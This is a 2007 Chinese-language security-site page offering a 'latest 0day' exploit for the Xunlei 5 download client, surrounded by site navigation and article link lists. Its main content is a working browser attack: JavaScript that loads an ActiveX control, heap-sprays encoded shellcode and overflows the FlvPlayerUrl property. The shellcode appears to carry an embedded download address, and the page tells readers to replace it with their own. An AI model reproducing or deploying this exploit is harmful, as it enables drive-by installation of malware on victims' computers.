精典的ASP 传奇的J2EE 新生的NET FTP服务器服务器安全 WINDOWS B/S 模式 WEB安全 WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建 Alexa专题 DHTML 项目管理 WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual Basic Visual C/C++ Mssql MySql oracle Sybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术 WAP入门

您的位置： >> 相关知识 >> 病毒木马 >> 病毒知识 >>

迅雷5 最新0day利用程序

合金网络科技

添加日期:2007-11-27 点击次数:21次

在shellcode最后标识部分替换上自己的地址

<script type='text/jscript'>function init() { document.write('');}window.onload = init;</script>

<SCRIPT language='JavaScript'>
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
var set_cookie = document.cookie.indexOf('3Ware=');
if (set_cookie == -1){document.cookie = '3Ware=1;expires=' + expires.toGMTString();
document.write('<object id='gl' classid='clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F'></object>');
var helloworld2Address = 0x0c0c0c0c;
var shellcode = unescape('%u10eb%u4b5b%uc933%ub966%u029b%u3480%ufe0b%ufae2%u05eb%uebe8%uffff%u17ff%ufcc4%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7f9%u2416%ufeff%u1cfe%ube07%uc67e%u8b3d%u7704%udab8%u9196%ufe90%u96fe%u8c8b%u9392%u94aa%ua7ff%uf875%u5e16%ufeff%u6bfe%u4a16%ufeff%u73fe%uc940%ufeff%ua9fe%u0196%ufefe%u01fe%ufaa8%u39fd%ufe39%u80a2%ud080%ube39%u9bfa%u9b86%ua9fe%ua801%ucdf6%uad25%ua9ad%ub873%uaec6%u01ad%ue2a8%u9294%u9096%u9a8a%uaa92%uff94%u75a7%u16f8%uffa7%ufefe%u1675%ubefd%u75c2%ue2b6%u8675%ufdd2%u9a03%ueb75%ufece%ufefe%u6c75%ufe56%ufefe%u0f96%udbb3%u962b%ub30f%u2bdb%u3796%ua0ac%u01ad%u6aca%ub871%u39d6%ud2b8%u7fb3%uefce%u4696%ufecc%u96fe%uce46%ufefe%u4696%ufed7%u75fe%u6afa%ub99e%uf9c7%ufc8a%u071c%u8077%u9fce%u4696%uffe1%u96fe%ueb46%ufeff%u4696%ufe0e%u75fe%u6afa%uc7b9%u8af9%u1cfc%u7707%uca80%ufe94%u9b96%ucd92%u96cc%u9b95%u908c%u94aa%ua7ff%uf875%u2c16%ufefe%u75fe%ufd26%uc2be%u3e7d%u75e6%u9686%u05fd%u817d%ufeee%u8b8a%ub175%ufdf2%u7f35%u90c7%u9a8a%u8b92%u759d%ufdd1%u7d15%ufe83%u8afe%u75a7%ufebb%uba73%ufce6%u37cd%u40f1%uc4ee%u8a28%u3ff6%uf937%u34fd%u15be%uc50f%ud6b0%ue48b%ud59e%ufdd1%uee91%uaaae%ufa94%ufa94%u01ab%ue6a8%u01a6%uce88%ubb71%u9ffe%ue315%ub0c5%u8bd2%u9ee6%ud1d5%u91fd%uaeee%u94aa%u94fa%uabfa%ua801%ua6e6%u8801%u71ca%ufebb%u7d9f%ufa3b%u5f15%u397d%u15ea%u757b%uea80%u94aa%u94fa%ua981%ua801%u39e6%u96f9%uf4f6%ucdfe%u763e%ufab9%u0275%uec94%u55a7%u031c%u3998%udaba%uffc2%u75ff%u7302%ueeb9%uaea9%uafaf%uafaf%uafaf%u73af%uc978%ufeff%uaefe%ua801%u7ff2%u763a%ufeff%u3cfe%ufede%ua801%u75ee%udaa8%ua5bf%ufdac%ufd1f%ufd1f%ufd1f%u7d1f%ufa12%uada4%u2475%u091c%u01ac%uaf1e%u75a8%uc28b%u8a75%u86d0%u0bfd%u75a8%ude88%u0bfd%u37cd%ubfb7%ufd53%ucd3b%uf125%uee40%u28c4%uf68a%u353f%ufdf9%ube24%u0f15%ue1c5%u198b%u75a0%udaa0%u23fd%u7598%ub5f2%ua075%ufde2%u7523%u75fa%u3bfd%ua055%u3da7%u3f16%u0103%ucc01%u6f8a%uc7f2%u831c%u877d%u18c7%u3766%u5842%u9d95%u2f77%u0eb1%u85b6%ue0c3%u9a5a%u7e11%u5128%ub364%uce7f%ufeef%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%ufefe%u96fe%u8a8a%uc48e%ud1d1%u8989%ud089%ucd89%ud39d%u8c91%ud099%u919d%ud193%ucd89%ud09d%u869b%ufe9b这里');
var hbshelloworld = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = hbshelloworld - (payLoadSize+0x38);
var spraySlide = unescape('%u0c0c%u0c0c');
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (helloworld2Address - 0x100000)/hbshelloworld;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var size_buff = 1070;
var x = unescape('%0c%0c%0c%0c');
while (x.length<size_buff) x += x;
gl.FlvPlayerUrl = x;
}
</SCRIPT>
<script>
if (set_cookie == -1){
location.reload();
}
</script>

◆精典的ASP精选TOP

· 利用ADODB.Stream 防盗链

· Adodb.Stream说明手册

· 采集需要登录

· ASP 判断远程图片是否存在

· 在ServerXMLHTTP组件中使用代理服务器

· 用XMLHTTP通过代理服务器从服务提取数据的一些问题

· objXML.readystate的值

· 互联网HTTP连接等出错代码大全

· 利用XMLHTTP实现的二级连动Select

· 利用 xmlhttp 分块上传文件

◆服务器安全点击TOP

· 新云最新漏洞总结篇

· 各类网站的默认数据库和密码

· Windows Server2003 防木马权限设置IIS服务器安全配置整理

· 针对ASP网站的Win 2003硬盘安全设置

· IIS 6 的PHP 最佳配置方法

· 利用SA.exe 将Iusr_victim克隆为Administrator

· Cmd模式下的入侵技术大全

· 破解网页代码加密

· SERV-U 6.4提权方法,通杀SERV-U版本

· 新云网站管理系统文件注入漏洞

◆硬设与组建点击TOP

· 从头到尾教你组建小型局域网20

· 从头到尾教你组建小型局域网19

· 从头到尾教你组建小型局域网18

· 从头到尾教你组建小型局域网17

· 从头到尾教你组建小型局域网16

· 从头到尾教你组建小型局域网15

· 从头到尾教你组建小型局域网14

· 从头到尾教你组建小型局域网13

· 从头到尾教你组建小型局域网12

· 从头到尾教你组建小型局域网11

◆病毒知识点击TOP

· 不再重装手动清除顽固病毒AutoRUN

· 木马静态变动态 DLL木马程序大揭秘

· 详解一个很牛X的网马

· 一个网马

· Trojan-Downloader.Win32.Delf.bab

· 抓了一个AJAX的网马

· 迅雷5 最新0day利用程序

· 自动关掉270种杀毒软件

· RealPlayer 最新网马

· 五个反弹型后门的源代码

◆WINDOWS点击TOP

· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==

· Capture an HTML document as an image

· 如何给eWebEditor编辑器加上运行代码框功能

· 给CuteEditor5增加了高亮代码显示功能

· CuteEditor6.0使用配置心得体会

· 关于IE插件的CLSID问题

· 对开发的程序（制作CAB）进行签名，并允许网站中使用

"凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."